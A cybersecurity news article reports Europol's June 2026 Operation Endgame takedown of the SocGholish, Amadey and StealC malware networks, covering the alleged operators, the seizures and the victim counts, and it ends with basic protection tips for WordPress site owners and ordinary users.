Do Son 
Image: Europol
At a Glance
| Actor / group | SocGholish operator (TA569), linked to Russia’s Evil Corp; Amadey and StealC malware-as-a-service crews |
|---|---|
| Activity type | Malware loaders and an infostealer used to seed ransomware and fraud |
| Targets / victims | Windows users worldwide; nearly 15,000 hacked websites, many on WordPress |
| Scale (claimed) | EUR 41M crypto flagged; 27M credentials recovered; 326 servers down |
| Law-enforcement status | Infrastructure seized; Microsoft filed a civil suit against alleged operators |
| Source | Europol press release, 24 June 2026 |
TL;DR
Europol and global partners struck three malware networks under Operation Endgame. The action hit SocGholish, Amadey, and StealC across 326 servers. Police also flagged EUR 41 million in crypto and recovered 27 million stolen credentials.
What Happened
On 24 June 2026, Europol announced a new Operation Endgame wave. Investigators actioned 326 servers and 142 domains in two weeks. Europol called the move a “landmark blow to cybercriminal networks.” The goal was to disrupt the “assembly lines” cybercriminals use. Microsoft, ESET, Proofpoint, and other firms joined the effort. Together, they seized infrastructure that fed ransomware and fraud.
The tools ran on a “cybercrime-as-a-service” model. Affiliates rented them to break into target systems.
How the three tools fit together
Each tool played a clear role. SocGholish and Amadey opened the door to victim systems. StealC then harvested passwords, cookies, and crypto wallets.
Who Is Behind It
The SocGholish malware loader sits at the center of this story. SocGholish has operated since at least 2018. It works as an initial access broker for ransomware crews. Europol links SocGholish to the Russian group Evil Corp. That crew also built the older Zeus and Dridex malware. Researchers track the operator as TA569.
Microsoft also sued several alleged Amadey and StealC operators. Authorities have not named those suspects publicly.
Impact and Scale
The numbers show the operation’s reach. Police remediated 14,971 hacked websites tied to SocGholish. Many of these were WordPress sites for small businesses. Europol said officers took 326 servers offline, “severely crippling the malware’s distribution network.” Per Microsoft, Amadey and StealC hit over 140,000 computers in early May 2026. Microsoft’s unit also identified thousands of victim machines. It then began helping providers protect those users. However, Europol cites these crypto and credential figures as its own estimates.
What Comes Next and How to Stay Protected
Operation Endgame is not finished. Past phases led to arrests and more server seizures. Meanwhile, SocGholish operators may rebuild fast. Their infrastructure often rotates every few days. So defenders should expect fresh domains soon.
For WordPress site owners
Site owners face the most urgent cleanup. First, change all admin passwords right away. Next, enable multi-factor authentication on every account. Then delete any unknown admin users. Finally, update WordPress core, themes, and plugins.
For everyday users
Regular users should distrust browser update pop-ups. Real updates come from official settings or app stores. For the full picture, read Europol’s official announcement.
Support Our Threat Intelligence
If you find our CVE report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
